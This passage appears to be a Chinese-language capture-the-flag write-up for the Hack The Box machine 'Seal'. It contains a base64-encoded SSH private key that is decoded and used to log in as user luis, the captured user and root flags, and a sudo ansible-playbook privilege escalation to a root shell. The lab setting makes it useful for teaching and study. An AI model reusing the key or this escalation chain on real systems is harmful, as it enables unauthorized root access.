TG00K0lCenZjSEZRYU83TFVHMm9QRXdUbDBpaTdTbWFYZGFoZENmUXdrTjUKTmtmTFhmVXFnNDFuRE9mTHlSQ3FOQVh1K3BFYnA4VUlVbDJ0cHRDSm8vekR6VnNJNEFBQURCQU9Vd1pqYVptNncvRUdQNgpLWDZ3MjhZL3NhLzBoUGhMSnZjdVpiT3JnTWorOEZsU2NlVnpuQTNnQXVDbEpOTm4walBaMFJNV1VCOTc4ZXU0SjNzZTVPCnBsVmFMR3J6VDg4SzBuUWJ2TTNLaGNCanNPeENwdXd4VWxUckppNitpOVd5UEVOb3ZFV1U1Yzc5V0pzVEtqSXBNT21FYk0Ka0NidFRSYkh0dUt3dVNlOE9XTVRGMitCbXQwbk1RYzlJUkQxSUkyVHhORExOR1ZxYnE0ZmhCRVc0Y28xWDA3NkNVR0RueAo1SzVIQ2plbDk1Yis5SDJaWG5XOUxlTGQ4RzdvRlJVUUFBQU1FQXlIZkRaS2t1MzZJWW1OZURFRWNDVXJPOU5sME5sZTdiClZkM0VKdWc0V3NsL24xVXFDQ0FCUWpoV3BXQTNvbmlPWHdtYkFzdkZpb3g1RWRCWXpyNnZzV21lbGVPUVRSdUpDYnc2bGMKWUc2dG13VmVUYmhreWNYTWJFVmVJc0cwYTQyWWoxeXdycTVHeVhLWWFGcjNEbkRJVGNxTGJkeElJRWRIMXZyUmpZeW5WTQp1ZVg3YXE5cElYaGNHVDZNOUNHVUpqeUVrdk9yeCtIUkQ0VEt1MGxHY08zTFZBTkdQcVNma3M0cjVFYTRMaVo0UTRZbk9KCnU4S3FPaURWcndtRkpSQUFBQUNXeDFhWE5BYzJWaGJBRT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==
tomcat@seal:/tmp/dashboard/uploads/.ssh$

echo LS0tLS......EtFWS0tLS0tCg== | base64 -d > id_rsa

┌──(kali㉿kali)-[~/桌面]
└─$ chmod 600 id_rsa 

┌──(kali㉿kali)-[~/桌面]
└─$ ssh luis@10.10.10.250 -i id_rsa        
The authenticity of host '10.10.10.250 (10.10.10.250)' can't be established.
ED25519 key fingerprint is SHA256:CK0IgtHX4isQwWAPna6oD88DnRAM9OacxQExxLSnlL0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.250' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 21 Jan 2024 02:55:30 PM UTC

  System load:           0.05
  Usage of /:            46.6% of 9.58GB
  Memory usage:          26%
  Swap usage:            0%
  Processes:             165
  Users logged in:       0
  IPv4 address for eth0: 10.10.10.250
  IPv6 address for eth0: dead:beef::250:56ff:feb9:9cd9


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri May  7 07:00:18 2021 from 10.10.14.2
luis@seal:~$ id
uid=1000(luis) gid=1000(luis) groups=1000(luis)
luis@seal:~$ 

27、成功登录，接下来就是获取第一个flag信息了

luis@seal:~$ ls
gitbucket.war  user.txt
luis@seal:~$ cat user.txt
4923ddadf9345f6a0a97f56293c05978
luis@seal:~$ 

0x02 系统权限获取

28、查看下sudo配置情况

luis@seal:~$ sudo -l
Matching Defaults entries for luis on seal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User luis may run the following commands on seal:
    (ALL) NOPASSWD: /usr/bin/ansible-playbook *
luis@seal:~$ 

29、这不就是有手就行的提权吗

https://gtfobins.github.io/gtfobins/ansible-playbook/#sudo

luis@seal:~$ 
luis@seal:~$ TF=$(mktemp)
luis@seal:~$ echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF
luis@seal:~$ sudo ansible-playbook $TF
[WARNING]: provided hosts list is empty, only localhost is available. Note that the
implicit localhost does not match 'all'

PLAY [localhost] ************************************************************************

TASK [Gathering Facts] ******************************************************************
ok: [localhost]

TASK [shell] ****************************************************************************
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
8ff1861d54ac0990d9a8cdbebcceecd2
# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/358